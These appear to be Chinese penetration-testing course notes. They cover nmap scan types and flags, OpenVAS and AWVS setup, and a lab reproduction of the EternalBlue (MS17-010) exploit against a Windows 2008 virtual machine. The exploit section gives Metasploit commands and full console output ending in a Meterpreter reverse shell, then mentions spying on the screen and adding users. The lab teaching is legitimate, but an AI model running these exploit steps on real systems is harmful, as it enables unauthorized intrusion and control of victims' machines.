扫描技术
扫描
自动化
提高效率
扫描神器
nmap,跨平台使用
官网:https://nmap.org
如果使用kali中的nmap扫描的时候,建议桥接网络。在没有指定端口的情况下,默认扫描top 1000 端口。
资产发现
发现目标环境中有哪些资产(联网设备,主机,服务器,各种服务等)
资产整理,发现,收集
主机发现:
有哪些主机在线?IP地址
端口扫描:
确定在线的某个主机开启了哪些端口,开启了端口就会有相应的服务
扫描方式:
TCP 全链接扫描
nmap -sT 10.0.105.1 -p 80 建立完整的三次握手过程
SYN 半连接扫描
nmap -sS ip -p port 只进行三次握手的前两次
隐蔽扫描(不适用于windows系统)
Null 扫描 -sN 发个包,包的标志位全为0
Xmas 扫描 -sX
FIN 扫描 -sF
命令:
nmap ip
nmap 127.0.0.1
nmap 10.1.105.0/24 -sP
参数:
-sP或者-sn 不进行端口扫描
-p 指定端口 -p 80 -p 1-65535 -p 80,3389 -p-:表示-p 1-65535
-sV 显示服务的详细版本 nmap -sV 127.0.0.1 -p 22
端口状态:
开放
关闭
过滤
未过滤
开放|过滤
关闭|过滤
工具:
抓包工具:wireshark
ip.addr == 10.157.14.169 and tcp.port == 80
网络漏洞扫描
我们可以通过网络漏洞扫描,全面掌握目标服务器存在的安全漏洞。市面上常用的扫描有Nessus,NeXpose,OpenVAS等,
这些扫描器都有商业版,免费版或者家庭版。
本课程使用的网络扫描器是OpenVAS,可以用来识别远程主机,web应用存在的各种漏洞。Nessus曾是业内开源漏洞扫描工具的标准,在Nessus商业化不再开放源代码后,在它的原始项目中分支出OpenVAS开源项目。经过多年的发展,OpenVAS已经成为当前最好的开源。
漏洞扫描器,功能非常强大,甚至可以与一些商业的漏洞扫描器相媲美。OpenVAS使用NVT脚本对多钟远程系统(包括Windows,linux以及web应用等)的安全问题进行检测
原理:
网络漏洞扫描指的是利用一些自动化工具发现网络上各类主机设备的安全漏洞。这些自动化工具通常称之为漏洞扫描器。
黑盒扫描:
一般是通过远程识别服务的类型和版本,对服务是否存在漏洞进行判定,在一些最新的漏洞扫描软件中,应用了一些更高级的技术,比如模拟渗透攻击等。
白盒扫描:
在拥有主机操作权限的情况下进行漏洞扫描。比如微软的补丁更新程序会定期对你的操作系统进行扫描,查找存在的安全漏洞,并向你推送相应的操作系统补丁。
白盒扫描的结果更加准确,但一般来说它所识别出的漏洞不应当作为外部渗透测试的最终数据,因为这些漏洞由于防火墙和各类防护软件的原因很可能无法在外部渗透测试中得到利用。同时,一般情况下你是没有机会获取用户名和口令。
漏洞扫描一般会附带一个用于识别主机漏洞的特征库,并定期进行更新。在漏洞扫描的时候,就是利用特征库里面的脚本与目标系统的反馈信息进行匹配,如果能匹配上,就说明存在某一个漏洞。
漏洞扫描器在识别漏洞的过程中,会向目标发送大量的数据包,有时候会导致目标系统拒绝服务或被扫描数据包阻塞,扫描行为也会被对方的入侵检测设备发现。
漏洞扫描器扫描出的结果通常会有很多误报(报告的漏洞实际不存在)或者漏报,因此,需要对扫描结果进行人工分析,确定哪些漏洞是实际存在的,这个过程就叫做漏洞验证。这是渗透测试过程中不可缺失的一步,只有验证漏洞存在的真实性,才能对漏洞进行深度利用。
渗透测试过程中,在得到客户认可的情况下,可以使用扫描器进行扫描,但使用时一定要注意规避风险,对其系统运行可能造成的影响降到最低。
OpenVAS的使用
网络漏洞扫描实测:
开启OpenVAS,打开浏览器(可以是物理机,也可以是虚拟机)输入OpenVAS显示的IP地址。
扫描目标:
开始进行扫描的时候需要新建一个目标。
新建目标
填好相关信息,点击[create]
创建好的目标如下
扫描策略:
查看扫描模板,就是在扫描过程中使用的扫描策略和配置,这个扫描模板也可以自己配置。
扫描任务
创建好目标之后,我们创建扫描任务。
新建任务
填写好相关信息,名称自定义。扫描目标要选择之前我们配置过的,会以下拉列表的形式展现。
创建好的扫描目标如下。
点击开始按钮开始扫描。
扫描完成
扫描结束之后,显示已经完成。
点击任务状态,可以查看扫描结果
扫描报告
我们可以将扫描的结果以报告的形式保存下来,这里的报告格式自选。
输入上图中的IP到浏览器上,登录,【webadmin/123】
登录之后:
如下图配置:
保存之后:
然后点击Scans
点击new task
AWVS的安装与使用
在网上下载好AWVS
解压到虚拟机中
双击运行标红框的exe文件
此时,在安装的会弹出网页(类似于如何安装使用的视频教学),直接关掉就可以了。
点击finish之后,会出现如下弹窗:
先别关闭,双击运行红色图标的exe
点击右下角
会发现内容已经被填充了,关闭黑色窗口,然后点击next
然后点击finish
安装完成
双击运行:点击cancel
点击next
视频里面是nginx/1.4.1
永恒之蓝漏洞复现
开启一台win2008虚拟机和一台kali系统虚拟机
这两台虚拟机可以互通网络
win 2008 ip:10.157.12.151
kali:10.157.14.169
工具:MSF(metasploit framework)
步骤:
msfconsole
search ms17-010 查找漏洞代码
use exploit/windows/smb/ms17_010_eternalblue 使用何种攻击方式
set rhosts 10.157.12.151 设置攻击的主机的IP
set lhosts 10.157.14.169 本机IP,这一步可以省略
exploit 开启攻击
kali界面源码:
┌──(root💀kali)-[/]
└─# msfconsole
######## #
################# #
###################### #
######################### #
############################
##############################
###############################
###############################
##############################
# ######## #
## ### #### ##
### ###
#### ###
#### ########## ####
####################### ####
#################### ####
################## ####
############ ##
######## ###
######### #####
############ ######
######## #########
##### ########
### #########
###### ############
#######################
# # ### # # ##
########################
## ## ## ##
https://metasploit.com
=[ metasploit v6.0.30-dev ]
+ -- --=[ 2099 exploits - 1129 auxiliary - 357 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: Search can apply complex filters such as
search cve:2009 type:exploit, see all the filters
with help search
msf6 > search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
5 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 5, use 5 or use exploit/windows/smb/smb_doublepulsar_rce
msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.157.12.151
rhosts => 10.157.12.151
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhosts 10.157.14.169
lhosts => 10.157.14.169
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 10.157.12.220:4444
[*] 10.157.12.151:445 - Executing automatic check (disable AutoCheck to override)
[*] 10.157.12.151:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.157.12.151:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)
[*] 10.157.12.151:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.157.12.151:445 - The target is vulnerable.
[*] 10.157.12.151:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.157.12.151:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)
[*] 10.157.12.151:445 - Scanned 1 of 1 hosts (100% complete)
[*] 10.157.12.151:445 - Connecting to target for exploitation.
[+] 10.157.12.151:445 - Connection established for exploitation.
[+] 10.157.12.151:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.157.12.151:445 - CORE raw buffer dump (53 bytes)
[*] 10.157.12.151:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 10.157.12.151:445 - 0x00000010 30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73 008 R2 Enterpris
[*] 10.157.12.151:445 - 0x00000020 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50 e 7601 Service P
[*] 10.157.12.151:445 - 0x00000030 61 63 6b 20 31 ack 1
[+] 10.157.12.151:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.157.12.151:445 - Trying exploit with 12 Groom Allocations.
[*] 10.157.12.151:445 - Sending all but last fragment of exploit packet
[*] 10.157.12.151:445 - Starting non-paged pool grooming
[+] 10.157.12.151:445 - Sending SMBv2 buffers
[+] 10.157.12.151:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.157.12.151:445 - Sending final SMBv2 buffers.
[*] 10.157.12.151:445 - Sending last fragment of exploit packet!
[*] 10.157.12.151:445 - Receiving response from exploit packet
[+] 10.157.12.151:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.157.12.151:445 - Sending egg to corrupted connection.
[*] 10.157.12.151:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 10.157.12.151
[*] Meterpreter session 1 opened (10.157.12.220:4444 -> 10.157.12.151:64659) at 2022-02-19 16:07:54 +0800
[+] 10.157.12.151:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.157.12.151:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.157.12.151:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >
我们切回win2008,在CMD界面输入netstat会发现有建立连接
接下来就可以“干坏事了”,比如偷窥屏幕
还可以通过shell命令,以管理员的身份进入对方的操作系统。查看对方的IP地址或者是建立属于自己的用户。。。